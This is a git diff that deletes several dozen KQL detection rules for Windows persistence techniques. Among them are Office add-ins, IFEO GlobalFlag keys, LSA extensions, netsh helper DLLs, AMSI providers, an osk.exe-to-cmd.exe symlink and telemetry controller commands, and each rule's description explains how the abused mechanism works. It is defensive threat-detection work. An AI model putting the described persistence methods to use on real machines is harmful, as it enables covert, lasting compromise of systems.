--- a/Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/01/15
-// Level: high
-// Description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.
-// Tags: attack.persistence, attack.t1137.006
-DeviceRegistryEvents
-| where RegistryValueData endswith ".xll" and RegistryValueData startswith "/R " and RegistryKey contains "Software\\Microsoft\\Office" and RegistryKey endswith "\\Excel\\Options"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_GlobalFlags.kql b/Persistence/Potential_Persistence_Via_GlobalFlags.kql
deleted file mode 100644
index 0af11ee9..00000000
--- a/Persistence/Potential_Persistence_Via_GlobalFlags.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Karneades, Jonhnathan Ribeiro, Florian Roth
-// Date: 2018/04/11
-// Level: high
-// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
-// Tags: attack.privilege_escalation, attack.persistence, attack.defense_evasion, attack.t1546.012, car.2013-01-002
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\Image File Execution Options" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\SilentProcessExit"))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_LSA_Extensions.kql b/Persistence/Potential_Persistence_Via_LSA_Extensions.kql
deleted file mode 100644
index 8aa8287b..00000000
--- a/Persistence/Potential_Persistence_Via_LSA_Extensions.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass.
-The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
-
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv\\Extensions"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql b/Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql
deleted file mode 100644
index b8e4b63b..00000000
--- a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tom Ueltschi (@c_APT_ure)
-// Date: 2019/01/12
-// Level: high
-// Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence
-// Tags: attack.persistence, attack.t1037.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql b/Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql
deleted file mode 100644
index ff92bcaa..00000000
--- a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tom Ueltschi (@c_APT_ure)
-// Date: 2019/01/12
-// Level: medium
-// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
-// Tags: attack.t1037.001, attack.persistence, attack.lateral_movement
-DeviceRegistryEvents
-| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql b/Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql
deleted file mode 100644
index da19a9b2..00000000
--- a/Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Sreeman
-// Date: 2020/09/29
-// Level: medium
-// Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks.
-In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
-
-// Tags: attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "run " and ProcessCommandLine contains "\\Application Experience\\Microsoft Compatibility Appraiser") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql b/Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql
deleted file mode 100644
index c04b65b2..00000000
--- a/Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: NVISO
-// Date: 2020/05/11
-// Level: high
-// Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
-// Tags: attack.persistence, attack.t1137.006
-DeviceFileEvents
-| where (FolderPath contains "\\Microsoft\\Addins\\" and (FolderPath endswith ".xlam" or FolderPath endswith ".xla" or FolderPath endswith ".ppam")) or (FolderPath contains "\\Microsoft\\Word\\Startup\\" and FolderPath endswith ".wll") or (FolderPath contains "Microsoft\\Excel\\XLSTART\\" and FolderPath endswith ".xlam") or (FolderPath contains "\\Microsoft\\Excel\\Startup\\" and FolderPath endswith ".xll")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql b/Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql
deleted file mode 100644
index 8cd7e149..00000000
--- a/Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/02
-// Level: high
-// Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
-// Tags: attack.persistence, attack.t1137
-DeviceFileEvents
-| where (((FolderPath endswith ".doc" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dot" or FolderPath endswith ".dotm" or FolderPath endswith ".rtf") and (FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP"))) or ((FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm") and (FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")))) and (not((InitiatingProcessFolderPath endswith "\\WINWORD.exe" or InitiatingProcessFolderPath endswith "\\EXCEL.exe")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Mpnotify.kql b/Persistence/Potential_Persistence_Via_Mpnotify.kql
deleted file mode 100644
index aa6f3b3c..00000000
--- a/Persistence/Potential_Persistence_Via_Mpnotify.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql b/Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql
deleted file mode 100644
index 2439e7ac..00000000
--- a/Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/09
-// Level: high
-// Description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer" and RegistryKey endswith "(Default)"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql b/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql
deleted file mode 100644
index 5512073b..00000000
--- a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
-
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.007, attack.s0108
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql b/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql
deleted file mode 100644
index 95c6d258..00000000
--- a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Anish Bogati
-// Date: 2023/11/28
-// Level: medium
-// Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
-
-// Tags: attack.persistence, attack.t1546.007
-DeviceRegistryEvents
-| where RegistryValueData contains ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql b/Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql
deleted file mode 100644
index 7f67469f..00000000
--- a/Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker registers a new AMSI provider in order to achieve persistence
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\AMSI\\Providers" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers")) and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql b/Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql
deleted file mode 100644
index af2c5ac8..00000000
--- a/Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/10
-// Level: medium
-// Description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
-// Tags: attack.persistence
-DeviceFileEvents
-| where (FolderPath contains "\\Notepad++\\plugins\\" and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\gup.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and (InitiatingProcessFolderPath endswith "\\target.exe" or InitiatingProcessFolderPath endswith "Installer.x64.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Outlook_Form.kql b/Persistence/Potential_Persistence_Via_Outlook_Form.kql
deleted file mode 100644
index 05b0a258..00000000
--- a/Persistence/Potential_Persistence_Via_Outlook_Form.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021/06/10
-// Level: high
-// Description: Detects the creation of a new Outlook form which can contain malicious code
-// Tags: attack.persistence, attack.t1137.003
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\outlook.exe" and (FolderPath contains "\\AppData\\Local\\Microsoft\\FORMS\\IPM" or FolderPath contains "\\Local Settings\\Application Data\\Microsoft\\Forms")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql b/Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql
deleted file mode 100644
index 286ac042..00000000
--- a/Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021/06/09
-// Level: high
-// Description: Detects potential persistence activity via outlook home pages.
-// Tags: attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where ((RegistryKey contains "\\Software\\Microsoft\\Office" or RegistryKey contains "\\Outlook\\WebView") and RegistryKey endswith "\\URL") and (RegistryKey contains "\\Calendar" or RegistryKey contains "\\Inbox")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql b/Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql
deleted file mode 100644
index 8bbd5aeb..00000000
--- a/Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/04/05
-// Level: high
-// Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
-// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546
-DeviceRegistryEvents
-| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\LoadMacroProviderOnBoot"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql b/Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql
deleted file mode 100644
index 55524640..00000000
--- a/Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021/06/10
-// Level: high
-// Description: Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key "UserDefinedUrl".
-// Tags: attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "Software\\Microsoft\\Office" and RegistryKey contains "\\Outlook\\Today") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Stamp") or RegistryKey endswith "UserDefinedUrl") and (not((InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql b/Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql
deleted file mode 100644
index 7010220a..00000000
--- a/Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/04/08
-// Level: high
-// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql b/Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql
deleted file mode 100644
index 40b586b7..00000000
--- a/Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/20
-// Level: medium
-// Description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where RegistryValueData =~ "C:\\WINDOWS\\system32\\scrobj.dll" and RegistryKey endswith "InprocServer32\\(Default)"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql b/Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql
deleted file mode 100644
index 0e1cdf91..00000000
--- a/Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/01
-// Level: high
-// Description: Detects the installation of a new shim database where the file is located in a non-default location
-// Tags: attack.persistence, attack.t1546.011
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" and RegistryKey contains "\\DatabasePath") and (not(RegistryValueData contains ":\\Windows\\AppPatch\\Custom"))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql b/Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql
deleted file mode 100644
index be805d00..00000000
--- a/Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: medium
-// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
-The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time
-
-// Tags: attack.persistence, attack.t1546.011
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom") and (not(RegistryValueData =~ ""))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_TypedPaths.kql b/Persistence/Potential_Persistence_Via_TypedPaths.kql
deleted file mode 100644
index dab4531e..00000000
--- a/Persistence/Potential_Persistence_Via_TypedPaths.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/22
-// Level: high
-// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\SysWOW64\\explorer.exe"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
deleted file mode 100644
index 96f4cd8e..00000000
--- a/Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/14
-// Level: medium
-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql b/Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql
deleted file mode 100644
index f0a68dd4..00000000
--- a/Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2021/01/10
-// Level: medium
-// Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
-// Tags: attack.t1137.006, attack.persistence
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Microsoft\\Office\\Outlook\\Addins" or RegistryKey contains "\\Software\\Microsoft\\Office\\Word\\Addins" or RegistryKey contains "\\Software\\Microsoft\\Office\\Excel\\Addins" or RegistryKey contains "\\Software\\Microsoft\\Office\\Powerpoint\\Addins" or RegistryKey contains "\\Software\\Microsoft\\VSTO\\Security\\Inclusion") and (not(((InitiatingProcessFolderPath =~ "C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe" and RegistryKey contains "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt") or (InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") or (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\integrator.exe" or InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\visio.exe") or InitiatingProcessFolderPath endswith "\\Teams.exe")))
\ No newline at end of file
diff --git a/Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql b/Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql
deleted file mode 100644
index 7040127d..00000000
--- a/Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2021/07/01
-// Level: high
-// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\"
\ No newline at end of file
diff --git a/Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql b/Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
deleted file mode 100644
index 1a2be179..00000000
--- a/Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local")
\ No newline at end of file
diff --git a/Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql b/Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql
deleted file mode 100644
index c40a0f11..00000000
--- a/Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/11
-// Level: high
-// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql b/Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql
deleted file mode 100644
index 0be2e25f..00000000
--- a/Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @neu5ron
-// Date: 2019/02/07
-// Level: medium
-// Description: Detects potential malicious and unauthorized usage of bcdedit.exe
-// Tags: attack.defense_evasion, attack.t1070, attack.persistence, attack.t1542.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql b/Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql
deleted file mode 100644
index 128c30fe..00000000
--- a/Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/07
-// Level: medium
-// Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes
-// Tags: attack.persistence, attack.t1574
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Microsoft\\.NETFramework\\DbgManagedDebugger" and (not(RegistryValueData =~ "\"C:\\Windows\\system32\\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d"))
\ No newline at end of file
diff --git a/Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql b/Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql
deleted file mode 100644
index 3c143992..00000000
--- a/Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Lednyov Alexey, oscd.community, Sreeman
-// Date: 2020/10/16
-// Level: high
-// Description: Detects potential persistence behavior using the windows telemetry registry key.
-Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
-This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
-The problem is, it will run any arbitrary command without restriction of location or type.
-
-// Tags: attack.persistence, attack.t1053.005
-DeviceRegistryEvents
-| where ((RegistryValueData contains ".bat" or RegistryValueData contains ".bin" or RegistryValueData contains ".cmd" or RegistryValueData contains ".dat" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".hta" or RegistryValueData contains ".jar" or RegistryValueData contains ".js" or RegistryValueData contains ".msi" or RegistryValueData contains ".ps" or RegistryValueData contains ".sh" or RegistryValueData contains ".vb") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController" and RegistryKey endswith "\\Command") and (not((RegistryValueData contains "\\system32\\CompatTelRunner.exe" or RegistryValueData contains "\\system32\\DeviceCensus.exe")))
\ No newline at end of file
diff --git a/Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql b/Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql
deleted file mode 100644
index 3ae13744..00000000
--- a/Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Greg (rule)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut.
-If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.
-Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.
-
-// Tags: attack.persistence, attack.t1547
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\explorer.exe" and (FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" and FolderPath contains ".lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}")
\ No newline at end of file
diff --git a/Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql b/Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql
deleted file mode 100644
index 38a023b8..00000000
--- a/Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/03/06
-// Level: medium
-// Description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
-// Tags: attack.persistence
-DeviceRegistryEvents
